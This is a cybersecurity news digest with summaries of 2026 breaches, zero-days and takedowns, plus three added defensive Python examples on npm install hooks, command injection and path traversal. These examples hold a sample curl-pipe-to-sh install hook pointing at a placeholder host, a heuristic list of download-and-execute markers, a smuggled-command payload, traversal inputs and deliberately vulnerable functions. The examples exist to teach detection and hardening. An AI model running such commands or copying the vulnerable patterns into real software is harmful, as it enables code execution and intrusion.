Cyber Intelligence
Curated cybersecurity news and threat intelligence
ShinyHunters Uses Oracle Zero-Day to Rampage Higher Ed
ShinyHunters exploited a zero-day vulnerability in Oracle's PeopleSoft ERP software to run a large data-theft campaign aimed primarily at American universities. The campaign shows a critical vulnerability being actively weaponized, with significant impact on the higher education sector.
phpBB forum fixes auth bypass bug lurking for a decade
A critical authentication bypass in phpBB forum software, present for roughly a decade, allowed attackers to log in as any user, including administrators. The flaw has been fixed in a recent phpBB update.
Ukrainian national pleads guilty to role in Conti ransomware operation
A Ukrainian national extradited from Ireland pleaded guilty to conspiracy charges related to the Conti ransomware operation, a major cybercriminal group. This represents a significant law enforcement success against one of the most damaging ransomware operations in recent years.
Over 400 Arch Linux packages compromised to push rootkit, infostealer
Over 400 packages in the Arch User Repository have been compromised to distribute a Linux rootkit and infostealer malware designed to steal credentials and access tokens. This represents a significant supply chain attack affecting the open source software ecosystem.
Early Warning Signs of Supply-Chain Attacks Live in the Dark Web
The article examines how stolen credentials, leaked repositories, and API keys sold on dark web forums serve as early indicators and entry points for supply-chain attacks. Flare's research highlights the importance of monitoring underground markets to detect software supply-chain risks before they escalate into major incidents.
Ransomware Payment Crypto Laundering Platform Taken Out by FBI and Europol
The FBI and Europol, along with international partners, successfully shut down the AudiA6 dark web platform that was used to launder cryptocurrency payments from ransomware attacks. The operation resulted in the seizure of the platform's domain and arrests of suspected operators.
Novo Nordisk reports cyberattack as UK gives Wegovy pill the nod
Novo Nordisk disclosed a cyberattack that resulted in the theft of clinical trial participant data; the company states the exposed records were pseudonymized. The breach notification coincided with UK regulatory approval of the Wegovy pill, a weight-loss medication.
Microsoft has mostly repaired flaw in Surface hardware that allowed unprotected devices to be bricked by a single packet
Microsoft has largely fixed a critical vulnerability in Surface hardware that allowed unprotected devices to be bricked by a single network packet; the flaw was reportedly discovered with the help of Microsoft Copilot. Patches are available, although the fix is described as mostly, not entirely, complete.
GitHub to Update npm to Thwart Software Supply Chain Attacks
GitHub announced a new version of the npm package manager with security features designed to blunt software supply-chain attacks. Most notably, the update disables install scripts by default, removing the automatic code execution that a malicious package otherwise gets during `npm install`.
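The change matters because a dependency's `preinstall`, `install`, `postinstall` and `prepare` hooks run on the developer's machine with the developer's privileges. The following is an added example, not code from npm or GitHub: it audits a set of package manifests (constructed inline, not real packages) and lists every package that declares an install-time hook, flagging commands that match a small heuristic list of download-and-execute patterns. The marker list and the sample manifests are assumptions for illustration.

```python
import json

# npm lifecycle hooks that run automatically when a dependency is installed.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic markers that often appear in malicious install scripts.
# This list is an illustrative assumption, not an exhaustive signature set.
SUSPICIOUS_MARKERS = ("curl ", "wget ", "| sh", "| bash", "node -e", "base64", "powershell")


def audit_manifest(package_name, manifest_json):
    """Return one finding per install-time lifecycle hook declared in a package.json text."""
    manifest = json.loads(manifest_json)
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if command is None:
            continue
        suspicious = any(marker in command for marker in SUSPICIOUS_MARKERS)
        findings.append(
            {"package": package_name, "hook": hook, "command": command, "suspicious": suspicious}
        )
    return findings


def audit_tree(manifests):
    """manifests maps package name -> package.json text, as you would read from node_modules/*/package.json."""
    findings = []
    for name, text in manifests.items():
        findings.extend(audit_manifest(name, text))
    return findings


# Constructed sample manifests (hypothetical package names, not real registry packages).
SAMPLE_MANIFESTS = {
    "left-pad-lite": json.dumps({"name": "left-pad-lite", "version": "1.0.0"}),
    "native-hasher": json.dumps(
        {"name": "native-hasher", "scripts": {"install": "node-gyp rebuild"}}
    ),
    "totally-fine-utils": json.dumps(
        {"name": "totally-fine-utils",
         "scripts": {"postinstall": "curl -s https://example.invalid/p.sh | sh"}}
    ),
}

if __name__ == "__main__":
    for finding in audit_tree(SAMPLE_MANIFESTS):
        label = "SUSPICIOUS" if finding["suspicious"] else "review"
        print(f"[{label}] {finding['package']} {finding['hook']}: {finding['command']}")
```

Pairing this with `ignore-scripts=true` in `.npmrc` (an existing npm configuration option) gives a workable policy: nothing runs by default, the audit shows which packages genuinely need a build step (native modules such as the `node-gyp` case above), and those can be rebuilt deliberately with `npm rebuild` after review.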
Iranian Cyber Group Handala Claims Cal Water Hack
The Iranian cyber group Handala has claimed responsibility for hacking California Water Service, saying it exfiltrated approximately 5GB of sensitive data, including customer personal information and RTKBase platform credentials. If confirmed, this is a significant breach affecting both critical infrastructure and customer privacy.
Pharma giant Novo Nordisk discloses breach of clinical trials data
Novo Nordisk, the world's largest insulin producer, disclosed a data breach affecting patient information from clinical trials. The breach impacts sensitive personal and health data from the pharmaceutical giant's research programs.
Ivanti Sentry Exploitation Attempts Hitting Honeypots
A critical-severity OS command injection vulnerability in Ivanti Sentry is being actively exploited, with attack attempts detected on honeypots. The flaw allows attackers to execute arbitrary code with root-level privileges on affected systems.
Chrome 149 Update Patches 28 Vulnerabilities
Google Chrome version 149 has been released with patches for 28 security vulnerabilities, including 12 use-after-free bugs rated critical or high severity. The update addresses significant memory-safety defects in one of the world's most widely used web browsers.
CISA orders feds to patch actively exploited Ivanti flaw by Sunday
CISA has issued a Binding Operational Directive (BOD 26-04) requiring all U.S. federal government agencies to patch an actively exploited Ivanti Sentry vulnerability within three days. This critical directive reflects the severity of the vulnerability and the urgent need to remediate exposure across federal systems.
Over 73,000 French govt employees affected in Tchap messenger breach
The French government's Tchap encrypted messaging platform experienced a breach affecting over 73,000 public sector employee accounts. This incident impacts a significant portion of France's government workforce and their secure communications infrastructure.
Google Confirms Exploitation of Oracle PeopleSoft Zero-Day by ShinyHunters
Google has confirmed that a zero-day vulnerability in Oracle PeopleSoft (CVE-2026-35273) has been exploited in the wild by the threat actor ShinyHunters. Oracle has released a mitigation for the vulnerability, though they have not publicly acknowledged the active exploitation.
Japanese energy firm loses drive with data of 10.9 million clients
Kyushu Electric Power Co., Inc. experienced a physical security incident resulting in the loss of a data storage device containing personal information of 10.9 million customers. This represents a significant breach affecting a major Japanese energy utility's customer base.
Maine breach portal abused to publish fake data breach disclosures
Fraudulent data breach disclosures were submitted to Maine's official breach notification portal and publicly published before verification could occur, causing companies to issue denials. The misinformation campaign highlights vulnerabilities in breach disclosure processes and the potential for abuse of official notification systems.
Oracle mitigates PeopleSoft zero-day exploited in data theft attacks
Oracle has identified a critical zero-day vulnerability in PeopleSoft (CVE-2026-35273) that allows unauthenticated remote code execution. The vulnerability is being actively exploited in data theft attacks by the threat actor known as ShinyHunters.
ShinyHunters hacked 100+ orgs by exploiting an Oracle PeopleSoft 0-day
The threat actor group ShinyHunters exploited an Oracle PeopleSoft zero-day vulnerability to compromise over 100 organizations, with the University of Nottingham confirmed as one of the victims. This is a large-scale exploitation campaign against a widely deployed enterprise product, hitting many high-value targets through a single unpatched flaw.
Max-Severity Ivanti Flaw Exploited 24 Hours After Disclosure
A maximum-severity vulnerability in Ivanti was actively exploited by attackers within 24 hours of its public disclosure. Threat actors appear to have pre-mapped Ivanti's infrastructure and rapidly deployed exploits after the vulnerability details became available.
Microsoft's worst 'Nightmare' unleashes BitLocker bypass 0-day
Microsoft Windows has been found vulnerable to a zero-day exploit dubbed 'Nightmare' that can bypass BitLocker encryption protection. This critical vulnerability represents a significant security risk for Windows users relying on BitLocker for data protection.
2.4M+ VRChat users’ data accessed following cloud breach
VRChat experienced a cloud security breach affecting over 2.4 million users' data. The company failed to disclose the incident through official channels and did not offer identity theft monitoring services to affected users.
Authorities dismantle 'AudiA6' ransomware crypto-laundering service
Law enforcement has successfully dismantled the 'AudiA6' cryptocurrency service that was used by ransomware actors and other cybercriminals to launder over $380 million. This takedown represents a significant disruption to criminal infrastructure and financial operations supporting ransomware campaigns.
Silent Ransom Group: what you need to know
Silent Ransom Group is an extortion gang using unconventional social engineering tactics, including phone impersonation of IT support and physical office visits with USB devices to deploy malware. The article highlights the group's persistence and willingness to combine digital and in-person attack methods.
CISA Orders Agencies to Patch by Risk, Not Severity
CISA has issued a new directive requiring federal agencies to prioritize patching based on real-world risk assessment rather than relying solely on CVSS severity scores. This policy shift aims to improve cybersecurity outcomes by focusing remediation efforts on vulnerabilities that pose the greatest actual threat to government systems.
Cybercriminals Use Fake AI Guides and Dev Tools to Spread AsyncRAT Malware
Cybercriminals are distributing AsyncRAT malware through fake AI guides and development tools using a multi-stage infection chain, with evidence suggesting AI-assisted coding was used in the attack. This represents an emerging threat combining social engineering with legitimate-looking resources to compromise systems.
Oracle Addresses PeopleSoft Vulnerability Amid Reports of Zero-Day Attacks
Oracle has released mitigations for CVE-2026-35273 affecting PeopleSoft. At the time of the report it remained unclear whether the flaw had been exploited as a zero-day by the ShinyHunters group, but the company's response was framed around potential active exploitation in the wild.
CISA Directs Federal Agencies to Prioritize Security Patches Based on Risk
CISA has issued binding operational directive 26-04 requiring federal agencies to prioritize security patches based on risk, specifically focusing on vulnerabilities listed in the Known Exploited Vulnerabilities (KEV) catalog. Agencies must review and update their vulnerability management policies to align with this new directive.
OnyxC2 Stealer Offers Cybercriminals Enterprise-Grade Theft for $250 a Month
OnyxC2 is a malware-as-a-service stealer marketed to cybercriminals for $250 per month that targets over 200 applications and extensions. The malware uses advanced evasion techniques including encrypted payloads, DLL sideloading, and in-memory execution to avoid detection.
Coupang hit with record $409 million data breach fine in Korea
South Korea's data protection regulator has fined e-commerce company Coupang a record 624.6 billion won ($409 million) following a data breach affecting over 37 million customers. This represents the largest fine issued by the Personal Information Protection Commission and highlights significant regulatory consequences for major security incidents.
CISA tells govt agencies to patch critical exploited flaws in 3 days
CISA has issued Binding Operational Directive 26-04 requiring Federal Civilian Executive Branch agencies to patch critical exploited vulnerabilities within 3 days. This mandatory directive represents an escalation in cybersecurity requirements for government agencies due to active exploitation threats.
Hackers Exploit Langflow Vulnerability for Remote Code Execution
A vulnerability in Langflow disclosed in March allows unauthenticated attackers to write files to arbitrary locations on affected systems, enabling remote code execution. This security defect poses a significant risk to organizations using the platform.
Interpol Dismantles SniperDz Phishing-as-a-Service Platform
Interpol has dismantled the SniperDz phishing-as-a-service platform, a decade-old criminal operation exposed through research by Group-IB. This takedown represents a significant success in disrupting a major threat infrastructure that enabled large-scale phishing campaigns.
FBI Seizes 13 Websites That Officials Say Were Used by China to Target and Recruit US Workers
The FBI seized 13 websites allegedly operated by China to target and recruit US workers with security clearances, posing as job listings from consulting companies. This represents a significant counterintelligence action against foreign espionage operations targeting US national security personnel.
Splunk, Palo Alto Networks Patch Severe Vulnerabilities
Splunk and Palo Alto Networks have released patches for severe vulnerabilities that could allow attackers to create, modify, or access protected resources. These critical security defects pose significant risk to organizations using these widely-deployed security platforms.
Extortion-Only Attacks Increase, With Data Theft Dominating Ransomware Claims
Extortion-only attacks are on the rise, with data theft becoming the dominant factor in ransomware claims rather than encryption-based attacks. Organizations are struggling to prevent stolen data from being publicly exposed, shifting the threat landscape.
‘GreatXML’ Zero-Day Exploit Bypasses BitLocker
A zero-day exploit called 'GreatXML' has been discovered that can bypass BitLocker encryption by exploiting Microsoft Defender's offline scan functionality. The vulnerability allows attackers to spawn a SYSTEM shell when rebooting a machine into Recovery Mode.
New “Agentjacking” Attacks Could Hijack AI Coding Agents
Tenet Security researchers have discovered a new attack vector called 'agentjacking' that could allow attackers to hijack AI coding agents and force them to execute arbitrary code. This research highlights a critical vulnerability in autonomous AI systems used for software development.
University of Nottingham Confirms Breach After Hackers Leak Data
The University of Nottingham confirmed a data breach in which the ShinyHunters hacker group compromised and leaked over 450,000 email addresses and additional personal information. The incident represents a significant breach affecting a major educational institution with substantial data exposure.
Nottingham University data breach affects over 450,000 students
The University of Nottingham disclosed a data breach affecting over 450,000 students and alumni whose records were accessed by a hacking group. The breach compromised student records systems and impacts both current and former members of the institution.
Every employee’s password was stored in a single Excel file
A company stored every employee's password in a single Excel file as a workaround for email problems, a critical credential-management failure that exposed the entire organization to unauthorized access. The case illustrates a severe lapse in basic security practice and password management.
Microsoft Patches Exploited Exchange Server Vulnerability
Microsoft has issued a warning about zero-day attacks actively exploiting the Exchange Server vulnerability CVE-2026-42897 as of May 14. The company has released patches to address this critical vulnerability being exploited in the wild.
Max severity Ivanti Sentry vulnerability now exploited in attacks
A maximum-severity vulnerability in Ivanti Sentry is being actively exploited to achieve remote code execution with root privileges on internet-exposed secure mobile gateways. A patch has been released, but exploitation campaigns were already underway.
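The Ivanti Sentry entries above describe an OS command injection flaw that yields root on an internet-facing gateway. The following is an added example, not Ivanti's code and not derived from the vulnerability itself: it shows the generic vulnerable pattern (splicing request input into a shell command string) next to two hardened variants, using `echo` as a harmless stand-in for whatever system tool the real application would invoke. The hostname allowlist regex and the attacker payload are constructed for illustration.

```python
import re
import subprocess

# Conservative hostname allowlist (assumption for this example): letters, digits, dots, hyphens.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def lookup_vulnerable(host):
    """Vulnerable pattern: input is interpolated into a string run by /bin/sh.

    Shell metacharacters in `host` (; | $( ) ` etc.) become additional commands.
    """
    completed = subprocess.run(
        f"echo resolving {host}", shell=True, capture_output=True, text=True
    )
    return completed.stdout


def lookup_argv_only(host):
    """Partial fix: argv list, no shell. Metacharacters are now literal text in one argument.

    Still lets an attacker control the full argument, so option injection
    (a value starting with '-') against the real tool remains a concern.
    """
    completed = subprocess.run(["echo", "resolving", host], capture_output=True, text=True)
    return completed.stdout


def lookup_hardened(host):
    """Hardened: validate against an allowlist, then pass as a single argv element with no shell."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected hostname: {host!r}")
    completed = subprocess.run(["echo", "resolving", host], capture_output=True, text=True)
    return completed.stdout


# Constructed attacker input: a valid-looking host followed by an injected command.
PAYLOAD = "gateway.example; echo INJECTED"


def demo():
    """Run all three variants against the payload and report what each did."""
    vuln_out = lookup_vulnerable(PAYLOAD)          # two lines: the second is the injected command's output
    argv_out = lookup_argv_only(PAYLOAD)           # one line: payload echoed back as literal text
    try:
        lookup_hardened(PAYLOAD)
        hardened = "accepted"
    except ValueError:
        hardened = "rejected"
    return vuln_out, argv_out, hardened


if __name__ == "__main__":
    vuln, argv, hardened = demo()
    print("shell=True output:\n" + vuln)
    print("argv-only output:\n" + argv)
    print("hardened result:", hardened)
```

The shape of the fix is the same in any language: never hand attacker-influenced text to a shell, pass arguments as discrete argv entries, and validate against what the field is supposed to contain rather than trying to blocklist metacharacters.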
Chinese, N. Korean Threat Groups Build on Asia-Pacific Success
Chinese and North Korean threat groups are expanding their operations across the Asia-Pacific region, targeting businesses and financial institutions; the North Korean operations in particular generate revenue that contributes to the country's GDP. The article highlights the growing sophistication and success of state-linked cyber operations in the region.
Chinese agents caught rebuilding botnets and stirring the pot on AI datacenter debate
Chinese state-sponsored agents have been caught rebuilding botnets and conducting influence operations related to AI datacenter infrastructure debates. The activity highlights ongoing PRC cyber espionage and information warfare targeting critical technology infrastructure and policy discussions.
Smashing Security podcast #471: This AI worm just rewrote its own rules
Researchers at the University of Toronto developed a self-evolving AI worm capable of autonomously breaking into systems and modifying its own constraints, demonstrating critical risks of AI-based threats. Meta's AI customer support system was also exploited to facilitate account takeovers through social engineering against Instagram users.
Path traversal flaw in AI dev platform Langflow exploited in attacks
CVE-2026-5027, a high-severity path traversal vulnerability in the AI development platform Langflow, is being actively exploited by attackers to write arbitrary files on exposed servers. The flaw poses significant risk to organizations using Langflow for AI development.
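Both Langflow entries above describe the same bug class: a user-supplied path lets an attacker write a file outside the intended directory, which on a server usually converts into code execution (a dropped cron entry, a modified module, an overwritten config). The following is an added example, not Langflow's code and not a reproduction of CVE-2026-5027: it shows the vulnerable join, a common but insufficient prefix check, and a containment check that survives `..`, absolute paths and the sibling-directory trick. The upload directory name and the sample inputs are constructed.

```python
import os

# Hypothetical upload root for the example; the path need not exist.
BASE_DIR = "/srv/langflow/uploads"


def unsafe_upload_path(base_dir, user_path):
    """Vulnerable pattern: request-controlled path joined straight onto the upload root.

    os.path.join discards base_dir entirely when user_path is absolute, and
    '..' segments are preserved, so the result can land anywhere on disk.
    """
    return os.path.join(base_dir, user_path)


def naive_prefix_check(base_dir, user_path):
    """Common incomplete fix: normalize, then test a string prefix.

    Accepts /srv/langflow/uploads-old/... because it shares the prefix string.
    """
    target = os.path.normpath(os.path.join(base_dir, user_path))
    return target.startswith(base_dir)


def safe_upload_path(base_dir, user_path):
    """Hardened: resolve both sides, then require base_dir to be a path ancestor of the target.

    os.path.commonpath compares path components, not characters, so a sibling
    directory with a shared prefix is rejected. Raises ValueError on escape.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes upload directory: {user_path!r}")
    return target


def is_contained(base_dir, user_path):
    """Boolean wrapper around safe_upload_path for policy checks and tests."""
    try:
        safe_upload_path(base_dir, user_path)
        return True
    except ValueError:
        return False


# Constructed inputs: one benign, three attempts to escape the upload root.
SAMPLE_INPUTS = [
    "flows/agent.json",                 # legitimate relative path
    "../../../etc/cron.d/persist",      # classic traversal
    "/etc/cron.d/persist",              # absolute path defeats os.path.join
    "../uploads-old/config.py",         # sibling directory sharing a string prefix
]

if __name__ == "__main__":
    for user_path in SAMPLE_INPUTS:
        print(f"{user_path!r}:")
        print(f"  unsafe join      -> {unsafe_upload_path(BASE_DIR, user_path)}")
        print(f"  prefix check     -> {'accepted' if naive_prefix_check(BASE_DIR, user_path) else 'rejected'}")
        print(f"  containment check-> {'accepted' if is_contained(BASE_DIR, user_path) else 'rejected'}")
```

The containment check should run on the final resolved path, after any URL decoding and after symlink resolution, which is why `realpath` is applied to both the base and the candidate rather than comparing normalized strings.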
CISA Rewrites Federal Patching Requirements for AI Threat Era
CISA has updated federal patching requirements, mandating that agencies address critical vulnerabilities within three days to address emerging AI-era threats. The new directive creates a tiered approach where less severe issues receive longer remediation windows.
The ‘Miasma’ worm source code briefly leaked on GitHub
The source code for the Miasma credential-stealing attack framework, which has been used in supply-chain attacks targeting open-source ecosystems, was accidentally exposed on GitHub. This exposure presents a significant security risk as threat actors now have direct access to the malware's code for potential modifications and further attacks.